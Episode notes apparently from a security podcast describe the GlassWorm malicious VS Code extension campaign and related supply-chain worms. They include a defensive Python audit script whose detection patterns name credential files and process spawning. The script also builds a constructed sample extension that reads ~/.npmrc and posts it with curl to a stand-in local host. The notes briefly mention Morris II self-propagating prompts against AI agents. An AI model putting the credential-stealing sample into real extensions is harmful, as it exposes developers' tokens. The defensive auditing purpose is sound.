GlassWorm Explained: How Malicious VS Code Extensions Weaponise Developer Trust

Developer tools run with a level of trust most apps never get. They sit close to your code, your secrets, your terminals, your cloud logins, and your repo tokens. That trust is exactly what GlassWorm goes after.

In October 2025, researchers reported a cluster of compromised and lookalike VS Code extensions circulating via OpenVSX, with tens of thousands of installs linked to the initial wave. The reported behaviour is nasty and practical: harvesting GitHub, git, and npm credentials, scanning the machine for crypto-wallet extensions, and adding capabilities such as proxying and remote-access-style control of the developer's workstation.

What makes this story bigger than one campaign is the pattern behind it. Several write-ups tied the wider blast radius to the boring stuff that breaks everything: exposed marketplace tokens and compromised publisher accounts, which let an attacker push a malicious update to an extension people already trust. There was also public pushback on the "worm" label from OpenVSX, so in the episode we focus on what the malware actually does and how it spreads, rather than arguing about the headline.

Then it gets more uncomfortable. The reporting does not stop in October. There were follow-up findings later in 2025, including additional fake extensions impersonating popular tools, analysis of Rust-based implants, and more novel command-and-control techniques.

We also zoom out to the wider 2025 threat landscape, where automation keeps showing up. Supply chain worms like Shai-Hulud spread through npm by abusing maintainer accounts and tokens and injecting install-time lifecycle scripts into the packages they republish. At the same time, academic work like Morris II explores how adversarial prompts could self-propagate through connected GenAI applications in "agent" ecosystems. It's the same core lesson: identity compromise plus scale equals chaos.

If you build, ship, or self-host anything, this one's for you. You'll leave with a simple checklist: what to audit first (installed extensions, who publishes them, and their update history), what to lock down (marketplace and repo tokens, MFA on publisher and maintainer accounts, CI secrets), and how to reduce blast radius when something slips through.
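As a starting point for the "audit extensions and publishers" step, here is an added example (not from the episode, and not a tool the researchers published) that walks a VS Code extensions directory and flags the things the campaign description above calls out: publishers outside your allowlist, lookalike publisher ids or well-known names shipped by the wrong publisher, extensions that activate on every launch, and extension code that reaches for credential files, spawns processes, or enumerates other extensions. The on-disk layout it assumes (`<ext_dir>/<publisher>.<name>-<version>/package.json` next to the JavaScript entry point named in `main`) matches the usual `~/.vscode/extensions` tree, but check it on your machine; the allowlist, the known-publisher table, and the two sample extensions are constructed for the demo.

```python
"""Audit installed VS Code extensions for the warning signs described above.
Added example; the sample extensions it builds are constructed, not real ones."""
import difflib
import json
import re
import sys
import tempfile
from pathlib import Path

# Publishers you have decided to trust (assumption: edit to taste); anything else is reviewed by hand.
ALLOWED_PUBLISHERS = {"ms-python", "ms-vscode", "rust-lang"}

# Well-known extension names and the publisher that actually ships them (assumed table for the demo).
KNOWN = {"python": "ms-python", "rust-analyzer": "rust-lang", "cpptools": "ms-vscode"}

# Credential stores an editor plugin has no business reading: git, npm, GitHub CLI, netrc.
CREDENTIAL_FILES = (".npmrc", ".git-credentials", ".gitconfig", "hosts.yml", ".netrc")

# Code patterns that turn an editor plugin into a credential stealer or remote-control foothold.
SUSPICIOUS_CODE = {
    "spawns-processes": re.compile(r"require\(['\"]child_process['\"]\)"),
    "dynamic-eval": re.compile(r"\b(eval|new Function)\s*\("),
    "reads-credential-files": re.compile("|".join(re.escape(f) for f in CREDENTIAL_FILES)),
    "scans-other-extensions": re.compile(r"\.vscode[/\\]extensions"),
}


def audit_extension(ext_path: Path) -> list[str]:
    """Return a sorted list of finding tags for one installed extension directory."""
    pkg = json.loads((ext_path / "package.json").read_text())
    name, publisher = pkg.get("name", ""), pkg.get("publisher", "")
    findings = set()

    if publisher not in ALLOWED_PUBLISHERS:
        findings.add("publisher-not-allowlisted")

    # Lookalike checks: a well-known name from the wrong publisher, or a publisher id
    # that is one character away from a trusted one (ms-pyth0n vs ms-python).
    if name in KNOWN and KNOWN[name] != publisher:
        findings.add(f"impersonates-{KNOWN[name]}.{name}")
    for trusted in ALLOWED_PUBLISHERS:
        if trusted != publisher and difflib.SequenceMatcher(None, trusted, publisher).ratio() >= 0.8:
            findings.add(f"publisher-lookalike-of-{trusted}")

    # "*" activation means the extension code runs on every VS Code launch, before you open a file.
    if "*" in pkg.get("activationEvents", []):
        findings.add("eager-activation")

    # Grep the JavaScript entry point for the indicators above.
    main_file = ext_path / pkg.get("main", "")
    if pkg.get("main") and main_file.is_file():
        src = main_file.read_text(errors="replace")
        findings.update(tag for tag, pat in SUSPICIOUS_CODE.items() if pat.search(src))
    return sorted(findings)


def audit_directory(ext_dir: Path) -> dict[str, list[str]]:
    """Map publisher.name@version to its findings for every extension under ext_dir."""
    report = {}
    for pkg_file in sorted(ext_dir.glob("*/package.json")):
        pkg = json.loads(pkg_file.read_text())
        ident = f"{pkg.get('publisher')}.{pkg.get('name')}@{pkg.get('version')}"
        report[ident] = audit_extension(pkg_file.parent)
    return report


def build_sample_tree() -> Path:
    """Construct two demo extensions in a temp dir: a legitimate one and a lookalike."""
    root = Path(tempfile.mkdtemp(prefix="vsix-audit-"))
    samples = {
        "ms-python.python-2025.1.0": (
            {"name": "python", "publisher": "ms-python", "version": "2025.1.0",
             "activationEvents": ["onLanguage:python"], "main": "./out/extension.js"},
            "const vscode = require('vscode');\nexports.activate = () => {};\n",
        ),
        # Typosquatted publisher id, eager activation, credential theft, shell-out (constructed).
        "ms-pyth0n.python-1.0.0": (
            {"name": "python", "publisher": "ms-pyth0n", "version": "1.0.0",
             "activationEvents": ["*"], "main": "./out/extension.js"},
            "const cp = require('child_process');\nconst fs = require('fs');\n"
            "const os = require('os');\n"
            "const loot = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8');\n"
            "cp.execSync('curl -s -X POST -d @- http://127.0.0.1:9/', {input: loot});\n",
        ),
    }
    for dirname, (pkg, js) in samples.items():
        out = root / dirname / "out"
        out.mkdir(parents=True)
        (root / dirname / "package.json").write_text(json.dumps(pkg))
        (out / "extension.js").write_text(js)
    return root


if __name__ == "__main__":
    # Pass your real extensions dir (e.g. ~/.vscode/extensions) or run against the demo tree.
    target = Path(sys.argv[1]).expanduser() if len(sys.argv) > 1 else build_sample_tree()
    for ident, tags in audit_directory(target).items():
        print(f"{ident}: {', '.join(tags) or 'no findings'}")
```

Run it with no arguments to see the two constructed extensions scored, or point it at your own extensions directory. The findings are signals to review, not verdicts: plenty of legitimate extensions spawn processes, and a publisher outside your allowlist is only a prompt to check who actually owns that id and when the extension last changed hands.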

This episode uses a bit of AI magic to help research and structure it, but listeners are always welcome to email podcast@beitmenotyou.online if you want to do a fully human interview in the future.

Find everything else here: https://beitmenotyou.online

Support (no pressure):
Lightning: beitmenotyou@geyser.fund
Geyser: https://geyser.fund/beitmenotyou
BIC: bc1qkvc05av9u6ds2w5f8y4yevenqnqlc36zqt7jmp
ETH: 0xb2ad3d76dc2a6B283422e1B6c6957a1C5Ea857E3
SOL: 9pTYuMmU3guipw7Dp3EEuVUxhdVgjMYsFuhsCYbeYYNH
BASE: 0xb2ad3d76dc2a6B283422e1B6c6957a1C5Ea857E3
BINANCE: 0xb2ad3d76dc2a6B283422e1B6c6957a1C5Ea857E3
Fiat: https://revolut.me/beitmenotyou